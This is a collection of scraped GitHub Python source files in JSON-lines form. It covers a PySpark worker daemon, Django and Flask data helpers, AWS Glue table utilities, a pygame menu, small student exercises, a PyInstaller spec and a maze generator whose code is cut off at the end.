+{"seq_id":"16676384509","text":"import os\nimport sys\nimport multiprocessing\nfrom ctypes import c_bool\nfrom errno import EINTR, ECHILD\nfrom socket import socket, AF_INET, SOCK_STREAM, SOMAXCONN\nfrom signal import signal, SIGHUP, SIGTERM, SIGCHLD, SIG_DFL, SIG_IGN\nfrom pyspark.worker import main as worker_main\nfrom pyspark.serializers import write_int\n\ntry:\n POOLSIZE = multiprocessing.cpu_count()\nexcept NotImplementedError:\n POOLSIZE = 4\n\nexit_flag = multiprocessing.Value(c_bool, False)\n\n\ndef should_exit():\n global exit_flag\n return exit_flag.value\n\n\ndef compute_real_exit_code(exit_code):\n # SystemExit's code can be integer or string, but os._exit only accepts integers\n import numbers\n if isinstance(exit_code, numbers.Integral):\n return exit_code\n else:\n return 1\n\n\ndef worker(listen_sock):\n # Redirect stdout to stderr\n os.dup2(2, 1)\n\n # Manager sends SIGHUP to request termination of workers in the pool\n def handle_sighup(*args):\n assert should_exit()\n signal(SIGHUP, handle_sighup)\n\n # Cleanup zombie children\n def handle_sigchld(*args):\n pid = status = None\n try:\n while (pid, status) != (0, 0):\n pid, status = os.waitpid(0, os.WNOHANG)\n except EnvironmentError as err:\n if err.errno == EINTR:\n # retry\n handle_sigchld()\n elif err.errno != ECHILD:\n raise\n signal(SIGCHLD, handle_sigchld)\n\n # Handle clients\n while not should_exit():\n # Wait until a client arrives or we have to exit\n sock = None\n while not should_exit() and sock is None:\n try:\n sock, addr = listen_sock.accept()\n except 
EnvironmentError as err:\n if err.errno != EINTR:\n raise\n\n if sock is not None:\n # Fork a child to handle the client.\n # The client is handled in the child so that the manager\n # never receives SIGCHLD unless a worker crashes.\n if os.fork() == 0:\n # Leave the worker pool\n signal(SIGHUP, SIG_DFL)\n listen_sock.close()\n # Handle the client then exit\n sockfile = sock.makefile()\n exit_code = 0\n try:\n worker_main(sockfile, sockfile)\n except SystemExit as exc:\n exit_code = exc.code\n finally:\n sockfile.close()\n sock.close()\n os._exit(compute_real_exit_code(exit_code))\n else:\n sock.close()\n\n\ndef launch_worker(listen_sock):\n if os.fork() == 0:\n try:\n worker(listen_sock)\n except Exception as err:\n import traceback\n traceback.print_exc()\n os._exit(1)\n else:\n assert should_exit()\n os._exit(0)\n\n\ndef manager():\n # Create a new process group to corral our children\n os.setpgid(0, 0)\n\n # Create a listening socket on the AF_INET loopback interface\n listen_sock = socket(AF_INET, SOCK_STREAM)\n listen_sock.bind(('127.0.0.1', 0))\n listen_sock.listen(max(1024, 2 * POOLSIZE, SOMAXCONN))\n listen_host, listen_port = listen_sock.getsockname()\n write_int(listen_port, sys.stdout)\n\n # Launch initial worker pool\n for idx in range(POOLSIZE):\n launch_worker(listen_sock)\n listen_sock.close()\n\n def shutdown():\n global exit_flag\n exit_flag.value = True\n\n # Gracefully exit on SIGTERM, don't die on SIGHUP\n signal(SIGTERM, lambda signum, frame: shutdown())\n signal(SIGHUP, SIG_IGN)\n\n # Cleanup zombie children\n def handle_sigchld(*args):\n try:\n pid, status = os.waitpid(0, os.WNOHANG)\n if status != 0 and not should_exit():\n raise RuntimeError(\"worker crashed: %s, %s\" % (pid, status))\n except EnvironmentError as err:\n if err.errno not in (ECHILD, EINTR):\n raise\n signal(SIGCHLD, handle_sigchld)\n\n # Initialization complete\n sys.stdout.close()\n try:\n while not should_exit():\n try:\n # Spark tells us to exit by closing stdin\n if os.read(0, 512) == '':\n shutdown()\n except EnvironmentError as err:\n if err.errno != EINTR:\n shutdown()\n raise\n finally:\n signal(SIGTERM, SIG_DFL)\n exit_flag.value = True\n # Send SIGHUP to notify workers of shutdown\n os.kill(0, SIGHUP)\n\n\nif __name__ == '__main__':\n manager()\n","repo_name":"baeeq/incubator-spark","sub_path":"python/pyspark/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"571959850","text":"from datetime import datetime\nfrom datetime import date\nfrom sqlalchemy import or_, and_\n\nfrom app import db\nfrom app.models import Event, Tag\n\nclass TagsDao():\n\n def get_this_month_holiday_dates(self):\n curr_year = date.today().year\n db_tag = Tag.query.filter_by(name = 'Holiday').first()\n\n dates = []\n for db_event in db_tag.events:\n if (db_event.recurring or db_event.when == curr_year):\n dates.append(db_event.when.replace(year = curr_year) \\\n if db_event.recurring \\\n else db_event.when)\n\n return dates\n \n def get_this_month_event_dates(self):\n today = date.today()\n\n dates = []\n for db_event in Event.query.all():\n if ((db_event.when.year == today.year or db_event.recurring) \\\n and db_event.when.month == today.month):\n dates.append(db_event.when.replace(year = today.year) \\\n if db_event.recurring \\\n else db_event.when)\n\n return 
dates\n","repo_name":"kroldawi/Reminder","sub_path":"app/blueprints/events/daos.py","file_name":"daos.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40745498541","text":"from rest_framework_mongoengine.serializers import DocumentSerializer\nfrom rest_framework.fields import SerializerMethodField, ListField, DictField\nfrom rest_framework_mongoengine.validators import ValidationError\nfrom tree.models import Branch, BranchPost\nfrom mongoengine import EmbeddedDocumentField\n\n\nclass BranchSerializer(DocumentSerializer):\n\n class Meta:\n model = Branch\n fields = '__all__'\n read_only_fields = ('id', 'created_at', 'updated_at')\n\n\nclass BranchPostSerializer(DocumentSerializer):\n\n class Meta:\n model = BranchPost\n fields = '__all__'\n read_only_fields = ('id', 'created_at', 'updated_at')\n\n def __init__(self, *args, **kwargs):\n self.branch = kwargs.pop(\"branch\")\n super(BranchPostSerializer, self).__init__(**kwargs)\n\n def validate_values(self, values):\n if isinstance(values, dict):\n features_dict = self.branch.features_dict\n\n for key, value in values.items():\n if key not in features_dict:\n raise ValidationError(\"{} is not allowed option. [{}]\".format(key, features_dict.keys()))\n\n feature = features_dict[key]\n\n representation = feature[\"representation\"]\n if representation == \"number\":\n try:\n values[key] = float(value)\n except ValueError:\n raise ValidationError(\n {\"value\": \"'{}' is a wrong number\".format(value)})\n\n elif representation == \"choices\":\n value = str(value)\n if value not in feature[\"choices\"]:\n raise ValidationError(\n {\"value\": \"'{}' is a wrong choise\".format(value)})\n\n return values\n\n\n\n","repo_name":"alekseystryukov/treenet","sub_path":"treenet_api/tree/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4553617057","text":"import os\n\nimport pygame\n\nimport config\nfrom font import Font\nfrom game import Game\nfrom screen import Screen\n\n\nclass Menu(Screen):\n def __init__(self):\n self.font = Font(config.menufontpath, config.menufontsize)\n\n # init menu display\n self.selected = 0\n self.col_offset = 0\n \n \n def resize_view(self):\n \"\"\"Resize the view, redraw the background, reinit the font.\"\"\"\n # find the largest rectangle with the same ratio as basesize,\n # and a maximum of maxsize on either axis.\n ww, wh = self.window_view.get_size()\n bw, bh = config.menuratio\n mx, my = config.menumargin\n mult = min(ww * (1 - mx * 2) / bw, wh * (1 - my * 2) / bh)\n width, height = bw * mult, bh * mult\n left, top = (ww - width) / 2, (wh - height) / 2\n self.view = self.window_view.subsurface((left, top, width, height))\n \n # redraw the background\n self.background = pygame.Surface(self.view.get_size())\n self.background.fill(config.menubackcolor)\n \n # create text area\n tmx, tmy = config.menumargin\n tleft, ttop = tmx * width, tmy * height\n twidth, theight = width - tleft * 2, height - ttop * 2\n self.textarea = self.view.subsurface((tleft, ttop, twidth, theight))\n \n # find biggest font size that will fit the max number of rows\n # with the given leading, without going under the min size\n for size in range(config.maxfontsize, config.minfontsize - 1, -config.sizestep):\n rowtotal = size * config.maxrows\n leadtotal = int(size * config.leadpct) * 
(config.maxrows - 1)\n if rowtotal + leadtotal <= self.textarea.get_height():\n rows = config.maxrows\n break\n \n # if no size in range fits, start reducing number of rows\n if size == config.minfontsize:\n for rows in range(config.maxrows - 1, 0, -1):\n rowtotal = size * rows\n if rowtotal + leadtotal <= self.textarea.get_height():\n break\n \n self.fsize = size\n self.rows = rows\n self.leading = int(size * config.leadpct)\n \n # draw marker\n msize = self.fsize / 2\n self.marker = pygame.Surface((msize, msize))\n self.marker.fill((255, 0, 0))\n\n self.redraw = True\n\n\n def draw_frame(self):\n \"\"\"Draw the visible columns of options on the screen, and the marker.\"\"\"\n if self.redraw:\n # blit the background, text and marker onto the view\n self.view.blit(self.background, (0, 0))\n \n columns = config.columns\n colwidth = self.textarea.get_width() / columns\n \n srow = self.selected % self.rows\n scol = self.selected / self.rows\n \n # adjust offset to within (columns) of col\n self.col_offset = min(scol, max(self.col_offset, scol - columns + 1))\n \n # render and blit each line of text in each column that is showing\n options = self.options[self.rows * self.col_offset:\n self.rows * (self.col_offset + columns)]\n optfonts = self.font.render([option[0] for option in options],\n self.fsize, color=config.menufontcolor)\n \n for i, optfont in enumerate(optfonts):\n pos = (i / self.rows * colwidth + self.fsize,\n i % self.rows * (self.fsize + self.leading))\n self.textarea.blit(optfont, pos)\n \n # blit marker\n mmargin = self.fsize / 4\n self.textarea.blit(self.marker, ((scol - self.col_offset) * colwidth + mmargin,\n srow * (self.fsize + self.leading) + mmargin))\n \n self.redraw = False\n\n\n def run_frame(self, elapsed, keys):\n \"\"\"Scan for keystrokes and either switch menus or take actions.\"\"\"\n for key, keydown in keys:\n # arrow keys: change selection\n if keydown and key in (pygame.K_UP, pygame.K_RIGHT,\n pygame.K_DOWN, pygame.K_LEFT):\n col = self.selected / self.rows\n totalcols = (len(self.options) + self.rows - 1) / self.rows\n old_selected = self.selected\n\n if key in (pygame.K_UP, pygame.K_DOWN):\n # move marker up or down\n mod = 1 if key == pygame.K_DOWN else -1\n self.selected = max(0, min(self.selected + mod, len(self.options) - 1))\n \n elif key == pygame.K_LEFT and col > 0:\n # move marker left\n self.selected -= self.rows\n \n elif key == pygame.K_RIGHT and col < totalcols - 1:\n # move marker right\n self.selected = min(self.selected + self.rows,\n len(self.options) - 1)\n \n if self.selected != old_selected:\n self.redraw = True\n \n # enter key: open selected screen or quit this menu\n elif keydown and key == pygame.K_RETURN:\n screen, args = self.options[self.selected][1:]\n \n if not screen:\n return False\n \n self.selected = 0\n self.redraw = True\n return screen(*args)\n \n # escape key: quit menu\n elif keydown and key == pygame.K_ESCAPE:\n return False\n \n\n\nclass MainMenu(Menu):\n def __init__(self, leveldata):\n self.options = [('Play Game', LevelSelect, [leveldata]),\n ('Quit Game', False, ()),\n ]\n Menu.__init__(self)\n\n\n\nclass LevelSelect(Menu):\n def __init__(self, leveldata):\n self.options = [('Level ' + str(i + 1), Game, [leveldata, i])\n for i in range(len(leveldata))]\n Menu.__init__(self)\n\n ","repo_name":"saltire/roverchip","sub_path":"roverchip/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"11742117594","text":"from contextlib import contextmanager\nfrom typing import Generator\n\nfrom botocore.exceptions import ClientError\nfrom data_platform_logging import DataPlatformLogger\nfrom infer_glue_schema import InferredMetadata\n\n\ndef create_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n) -> None:\n \"\"\"\n Creates an empty athena table from the raw file pushed by\n a data producer for raw data.\n \"\"\"\n database_name = metadata.database_name\n create_glue_database(glue_client, database_name, logger)\n\n # Create raw data table, recreating it if necessary\n table_name = metadata.table_name\n try:\n glue_client.delete_table(DatabaseName=database_name, Name=table_name)\n except ClientError:\n pass\n glue_client.create_table(**metadata.metadata_str)\n logger.info(f\"created table {database_name}.{table_name}\")\n\n\ndef create_glue_database(glue_client, database_name, logger):\n \"\"\"If a glue database doesn't exist, create a glue database\"\"\"\n try:\n glue_client.get_database(Name=database_name)\n except ClientError as e:\n if e.response[\"Error\"][\"Code\"] == \"EntityNotFoundException\":\n db_meta = {\n \"DatabaseInput\": {\n \"Description\": \"database for {} products\".format(database_name),\n \"Name\": database_name,\n }\n }\n glue_client.create_database(**db_meta)\n else:\n logger.error(\"Unexpected error: %s\" % e)\n raise\n\n\ndef delete_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n):\n glue_client.delete_table(\n DatabaseName=metadata.database_name, Name=metadata.table_name\n )\n logger.info(f\"removed raw table {metadata.database_name}.{metadata.table_name}\")\n\n\n@contextmanager\ndef temporary_raw_athena_table(\n metadata: InferredMetadata, logger: DataPlatformLogger, glue_client\n) -> Generator[None, None, None]:\n try:\n create_raw_athena_table(\n metadata=metadata, logger=logger, glue_client=glue_client\n )\n yield\n finally:\n delete_raw_athena_table(\n metadata=metadata, logger=logger, glue_client=glue_client\n )\n","repo_name":"ministryofjustice/data-platform","sub_path":"containers/daap-athena-load/src/var/task/create_raw_athena_table.py","file_name":"create_raw_athena_table.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74519382883","text":"import numpy as np\n\n#in this file I will be using the numpy library to simplify and reduce the bolierplate of the code\n#numpy offers different funtions for calculation.\n\ndef neuron_with_np():\n inputs = [1, 2, 3, 2.5]\n weights = [0.2, 0.8, -0.5, 1.0]\n\n bias = 2\n\n #the funtion dot multiplies each element with other and adds it toghater e.g. w0*i0+.... 
+ bias\n output = np.dot(weights, inputs) + bias\n return output\n\ndef layer_of_neurons_with_np():\n inputs = [1, 2, 3, 2.5]\n weights = [[0.2, 0.8, -0.5, 1.0],\n [0.5, -0.91, 0.26, -0.5],\n [-0.26, -0.27, 0.17, 0.87]]\n \n bias = [2, 3, 0.5]\n\n #Since now I am working with a layer of neurons it is important to pas the parammeters to the dot funtion in the right oder\n #we pass the weights first since the first parrameter determins how the array will be indexed \n #the funtion will do the same thing however it will output 3 resaults since it will add the the inputs to each neuron and there are 3 neurons in total \n output = np.dot(weights, inputs) + bias\n return output\n\nneuron_output = neuron_with_np()\nprint(f\"Single neuron calculation using numPy: {neuron_output}\")\n\nlayer_output = layer_of_neurons_with_np()\nprint(f\"Layer of neurons calculation using numPy: {layer_output}\")","repo_name":"bombor11/Coding-Projects","sub_path":"AI/Practice/numpy_neural_netwok.py","file_name":"numpy_neural_netwok.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35200025","text":"import csv\n\nMODEL = '\"model\": \"preguntas.pregunta\",'\n\n\ndef armarRegistro(fila):\n clave = f'\"pk\": {int(fila[0])},'\n campos = '\"fields\": {'\n categoria = f'\"categoria\": {int(fila[1])}'\n texto = f'\"texto\": \"{fila[2]}\",'\n categoria += '}}'\n\n linea = '{' + MODEL + clave + campos + texto + categoria + ','\n return linea\n\n\nwith open('Preguntascsv.csv', encoding=\"utf8\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';')\n line_count = 0\n print(\"[\")\n for row in csv_reader:\n if line_count == 0:\n print(f'Column names are {\", \".join(row)}')\n line_count += 1\n else:\n print(armarRegistro(row))\n line_count += 1\n print(\"]\")\n\n\n","repo_name":"jhgakiyama/informatorio2021","sub_path":"crearJsonPreguntas.py","file_name":"crearJsonPreguntas.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13734412386","text":"# Faça um programa que leia um nome de usuário e a sua senha e \n# não aceite a senha igual ao nome do usuário, mostrando uma mensagem\n# de erro e voltando a pedir as informações.\n\nnome = input(\"Digite seu nome: \")\nsenha = input(\"Digite sua senha: \")\n\nvalidaSenha = False\n\nwhile validaSenha == False:\n if nome == senha:\n print(\"Erro! 
A senha não pode ser igual ao nome!\")\n senha = input(\"Digite sua senha: \")\n else:\n validaSenha = True","repo_name":"alencarburitijr/EFG-Python-Basico","sub_path":"Aula05/Exercicio02.py","file_name":"Exercicio02.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40720876963","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['main.py'],\n pathex=['C:\\\\Windows\\\\System32\\\\downlevel', 'E:\\\\carbonic'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=['PyQt5.Qt5Qml', 'PyQt5.Qt5Quick', 'PyQt5.Qt5Network'],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n# spec function\n\n# pyinstaller exe file size reduced with the help of https://github.com/pyinstaller/pyinstaller/issues/2270\n# Thanks to solution by @choice17\n\n\nKey = ['Qt5Qml','Qt5Quick', 'Qt5Network']\n\ndef remove_from_list(input, keys):\n outlist = []\n for item in input:\n name, _, _ = item\n flag = 0\n for key_word in keys:\n if name.find(key_word) > -1:\n flag = 1\n if flag != 1:\n outlist.append(item)\n return outlist\n\na.binaries = remove_from_list(a.binaries, Key)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='carbonic',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=False , icon='res\\\\g960.ico')\n","repo_name":"srevinsaju/carbonic","sub_path":"carbonic-win.spec","file_name":"carbonic-win.spec","file_ext":"spec","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"14874929174","text":"import logging\nLOGGER = logging.getLogger(__name__)\n\nfrom .base import BaseModelSerializer\nfrom ....utils.auth import get_org_model\n\nOrg = get_org_model()\n\n\nclass OrgSerializer(BaseModelSerializer):\n class Meta:\n model = Org\n fields = ['id', 'name', 'subdomain', 'preference_auth_google_oauth2',\n 'preference_auth_email_autocreate_domains',]\n","repo_name":"soby/django-inquiry","sub_path":"inquiry/core/api/v1/serializers/org.py","file_name":"org.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32060860353","text":"#! /usr/bin/python3\n#-*- coding: utf-8-*-\n#\n# Escola del Treball 2020-21\n# M03 Programacio\n# Exercicis de nadal\n# Felicitacio nadalenca\n# Cristian Fernando Condolo Jimenez\n# isx41016667\n# 23/12/2020\n# \n# Descripcion:\n# Hacer un programa que pase un numero entero positivo y dibuje un aveto de navidad.\n\n# Juego de pruebas\n# entrada salida\n# 6 *\n# ***\n# *****\n# *******\n# *********\n# ***********\n# ***\n# ***\n# ***\n# ***\n\n# E.E. 
1 num int\n\n# Programa\nimport sys\n\nAMPLITUD = 81\t\t#l'amplitud de la pantalla\nMISSATGE = f'Usage: felicitacio nadalena num {AMPLITUD // 2}'\nCARACTER = '*'\nBLANC = ' '\nLLARGADA_TRONC = 4\nAMPLADA_TRONC = 3\n\n# CONTROL D'ERRORS\n# perque no peti si no hi ha argument, cal comprovar la llargada de sys.argv\nif len(sys.argv) < 2:\n print(MISSATGE)\n exit(1)\n\n# com que ho hem comprovat abans aquesta linia no petara\ncadena = sys.argv[1]\n\n# comprovar que es un enter i major de 0\nif not cadena.isdigit():\n print(MISSATGE)\n exit(1)\n\n# ara no petara al fer int()\nllargada = int(cadena)\n\nmeitat = AMPLITUD // 2 \n# descartem els enters que no ens van bé\nif llargada > meitat :\n\tprint(MISSATGE)\n\texit(1)\n\n# PROGRAMA PRINCIPAL\nblancs = meitat\npunts = 1\n\n# dibuixo la copa\nfor i in range(0, llargada):\n\tprint(f'{BLANC * blancs}{CARACTER * punts}')\n\tblancs = blancs - 1\n\tpunts = punts + 2\n\t\n#dibuixo el tronc\nfor i in range(0, LLARGADA_TRONC):\n\tprint(f'{(meitat - 1) * BLANC}{AMPLADA_TRONC * CARACTER}')","repo_name":"KeshiKiD03/Python-ipc","sub_path":"Apuntes/Apuntes Christian/Programacio/UF1/Exercicis de nadal/felicitaciones_navideñas(2).py","file_name":"felicitaciones_navideñas(2).py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1135614288","text":"\"\"\"\nnavigate: Navigation software\n\nUsage:\n navigate [--plot] [--min-depth=DEPTH] \n navigate -h | --help\n navigate --version\n\nOptions:\n -h --help show this help\n --version show version info\n -d --min-depth=DEPTH compute using this minimum ship depth [default: 0]\n -p --plot plot results (assumes `pip install navigate[plot]`)\n\"\"\"\nimport os\nimport logging\n\nimport docopt\n\nfrom .io import get_last_depth, to_geojson\nfrom .algorithms import navigate\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\ndef parse_command_line():\n \"\"\"parse command line options\"\"\"\n options = docopt.docopt(__doc__)\n logger.info('options: %s', options)\n # parse and check input files\n options['filename'] = options['']\n assert os.path.isfile(options['filename']), 'file should exist'\n options['min-depth'] = float(options['--min-depth'])\n return options\n\n\ndef main():\n \"\"\"run the main program\"\"\"\n options = parse_command_line()\n filename = options['filename']\n data = get_last_depth(filename)\n navigation_results = navigate(data, options)\n print(to_geojson(navigation_results['xy']))\n","repo_name":"openearth/navigate","sub_path":"navigate/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8652273225","text":"import numpy as np\r\nfrom tqdm import tqdm\r\n\r\nbinmax = 1000\r\n# distribution ratio for each crystal system\r\nratio = np.array([1, 1, 1, 1, 1, 1, 1])\r\nfilename = str(ratio).replace(\" \", \"\").replace(\"[\", \"\").replace(\"]\", \"\")\r\nrdf = f\"td_fullrdf_mp\"\r\n\r\nsamples = np.load(f\"{rdf}/training_data_mp_{binmax}_pbc_big.npy\", allow_pickle=True)\r\nprint(f\"Batch size: {len(samples)}\")\r\n\r\nsystem = np.zeros(7)\r\nspgrp = np.zeros(230, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\n spgrp[np.argmax(z)] += 1\r\nprint(f\"Initial dataset: {system}\\n{spgrp}\")\r\n\r\n# # Balancing datasets for each space group\r\n# np.random.shuffle(samples)\r\n# spgrp = np.zeros(230, dtype=int)\r\n# 
for X, y, z in samples:\r\n# spgrp[np.argmax(z)] += 1\r\n# print(\"Balancing datasets\")\r\n# for i in tqdm(range(len(spgrp))):\r\n# j = 0\r\n# nToDel = spgrp[i] - 100\r\n# while j < len(samples):\r\n# if nToDel > 0:\r\n# if int(np.argmax(samples[j][2])) == i:\r\n# samples = np.delete(samples, [j][:], axis=0)\r\n# j -= 1\r\n# nToDel -= 1\r\n# j += 1\r\n\r\n# Balancing datasets for each crystal system\r\n# Number of samples per group (target number)\r\nn_pergroup = 4100\r\n\r\nnp.random.shuffle(samples)\r\nsystem = np.zeros(7, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\nprint(\"Balancing datasets\")\r\nfor i in tqdm(range(len(system))):\r\n j = 0\r\n nToDel = system[i] - int(n_pergroup * ratio[i])\r\n while j < len(samples):\r\n if nToDel > 0:\r\n if int(np.argmax(samples[j][1])) == i:\r\n samples = np.delete(samples, [j][:], axis=0)\r\n j -= 1\r\n nToDel -= 1\r\n j += 1\r\n\r\n# Displaying final distribution of dataset\r\nsystem = np.zeros(7)\r\nspgrp = np.zeros(230, dtype=int)\r\nfor X, y, z in samples:\r\n system[np.argmax(y)] += 1\r\n spgrp[np.argmax(z)] += 1\r\nprint(f\"Final dataset: {system}\\n{spgrp}\")\r\n\r\nnp.random.shuffle(samples)\r\n# Filename after packing and balancing\r\nnp.save(f\"packed_td/{rdf}_{filename}_{binmax}.npy\", samples)","repo_name":"chantomkit/Neural-network-for-classifying-crystal-systems-from-RDF","sub_path":"training_data_packing.py","file_name":"training_data_packing.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30918734767","text":"import random\n\n# Easy to read representation for each cardinal direction.\nN, S, W, E = ('n', 's', 'w', 'e')\n\nclass Cell(object):\n \"\"\"\n Class for each individual cell. 
Knows only its position and which walls are\n still standing.\n \"\"\"\n def __init__(self, x, y, walls):\n self.x = x\n self.y = y\n self.walls = set(walls)\n\n def __repr__(self):\n # <15, 25 (es )>\n return '<{}, {} ({:4})>'.format(self.x, self.y, ''.join(sorted(self.walls)))\n\n def __contains__(self, item):\n # N in cell\n return item in self.walls\n\n def is_full(self):\n \"\"\"\n Returns True if all walls are still standing.\n \"\"\"\n return len(self.walls) == 4\n\n def _wall_to(self, other):\n \"\"\"\n Returns the direction to the given cell from the current one.\n Must be one cell away only.\n \"\"\"\n assert abs(self.x - other.x) + abs(self.y - other.y) == 1, '{}, {}'.format(self, other)\n if other.y < self.y:\n return N\n elif other.y > self.y:\n return S\n elif other.x < self.x:\n return W\n elif other.x > self.x:\n return E\n else:\n assert False\n\n def connect(self, other):\n \"\"\"\n Removes the wall between two adjacent cells.\n \"\"\"\n other.walls.remove(other._wall_to(self))\n self.walls.remove(self._wall_to(other))\n\nclass Maze(object):\n \"\"\"\n Maze class containing full board and maze generation algorithms.\n \"\"\"\n\n def __init__(self, width=20, height=20):\n \"\"\"\n Creates a new maze with the given sizes, with all walls standing.\n \"\"\"\n self.width = width\n self.height = height\n self.cells = []\n for y in range(self.height):\n for x in range(self.width):\n self.cells.append(Cell(x, y, [N, S, E, W]))\n\n def __getitem__(self, index):\n \"\"\"\n Returns the cell at index = (x, y).\n \"\"\"\n x, y = index\n if 0 <= x < self.width and 0 <= y < self.height:\n return self.cells[x + y * self.width]\n else:\n return None\n\n def neighbors(self, cell):\n \"\"\"\n Returns the list of neighboring cells, not counting diagonals. 
Cells on\n borders or corners may have less than 4 neighbors.\n \"\"\"\n x = cell.x\n y = cell.y\n for new_x, new_y in [(x, y - 1), (x, y + 1), (x - 1, y), (x + 1, y)]:\n neighbor = self[new_x, new_y]\n if neighbor is not None:\n yield neighbor\n\n def _gid_matrix(self):\n str_matrix = [[0] * (self.width * 2 + 1)\n for i in range(self.height * 2 + 1)]\n\n for cell in self.cells:\n x = cell.x * 2 + 1\n y = cell.y * 2 + 1\n str_matrix[y][x] = 1\n if N not in cell and y > 0:\n str_matrix[y - 1][x + 0] = 1\n if S not in cell and y + 1 < self.width:\n str_matrix[y + 1][x + 0] = 1\n if W not in cell and x > 0:\n str_matrix[y][x - 1] = 1\n if E not in cell and x + 1 < self.width:\n str_matrix[y][x + 1] = 1\n \n #print(str_matrix)\n \n data_list=[]\n \n for x in range(self.height*2+1):\n for y in range(self.width*2+1):\n data=0\n if str_matrix[x][y] == 1:\n data = 57\n\n else:\n data = 211 \n if x == 0:\n n = 1\n else:\n n = str_matrix[x-1][y]\n\n if x == self.height*2:\n s = 1\n else:\n s = str_matrix[x+1][y]\n\n if y == 0:\n w = 1\n else:\n w = str_matrix[x][y-1]\n\n if y == self.width*2:\n e = 1\n else:\n e = str_matrix[x][y+1]\n\n\n\n # append gid at array data\n if n == 0 and e == 0 and s == 0 and w == 0:\n data=241\n elif n == 0 and e == 0 and s == 0 and w == 1:\n data=225\n elif n == 0 and e == 0 and s == 1 and w == 0:\n data=239\n elif n == 0 and e == 0 and s == 1 and w == 1:\n data=223\n elif n == 0 and e == 1 and s == 0 and w == 0:\n data=233\n elif n == 0 and e == 1 and s == 0 and w == 1:\n data=217\n elif n == 0 and e == 1 and s == 1 and w == 0:\n data=231\n elif n == 0 and e == 1 and s == 1 and w == 1:\n data=215\n elif n == 1 and e == 0 and s == 0 and w == 0:\n data=237\n elif n == 1 and e == 0 and s == 0 and w == 1:\n data=221\n elif n == 1 and e == 0 and s == 1 and w == 0:\n data=235\n elif n == 1 and e == 0 and s == 1 and w == 1:\n data=219\n elif n == 1 and e == 1 and s == 0 and w == 0:\n data=229\n elif n == 1 and e == 1 and s == 0 and w == 1:\n data=213\n elif n == 1 and e == 1 and s == 1 and w == 0:\n data=227\n \n # broken wall: 10%\n if random.randrange(1,11) == 1:\n isBrokenWall = 1\n else:\n isBrokenWall = 0\n data += isBrokenWall\n data_list.append(data)\n print(data_list)\n return data_list\n\n def randomize(self):\n \"\"\"\n Knocks down random walls to build a random perfect maze.\n Algorithm from http://mazeworks.com/mazegen/mazetut/index.htm\n \"\"\"\n cell_stack = []\n cell = random.choice(self.cells)\n n_visited_cells = 1\n\n while n_visited_cells < len(self.cells):\n neighbors = [c for c in self.neighbors(cell) if c.is_full()]\n if len(neighbors):\n neighbor = random.choice(neighbors)\n cell.connect(neighbor)\n cell_stack.append(cell)\n cell = neighbor\n n_visited_cells += 1\n else:\n cell = cell_stack.pop()\n\n @staticmethod\n def generate(width=20, height=20):\n \"\"\"\n Returns a new random perfect maze with the given sizes.\n \"\"\"\n m = Maze(width, height)\n m.randomize()\n return m\n \n\nclass MazeGame(object):\n \"\"\"\n Class for interactively playing random maze games.\n \"\"\"\n def __init__(self, maze):\n self.maze = maze or Maze.generate()\n\n def _get_random_position(self):\n \"\"\"\n Returns a random position on the maze.\n \"\"\"\n return (random.randrange(0, self.maze.width),\n random.randrange(0, self.maze.height))\n\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 1:\n width = int(sys.argv[1])\n if len(sys.argv) > 2:\n height = int(sys.argv[2])\n else:\n height = width\n else:\n width = 20\n height = 20\n map_width = width*2+1\n 
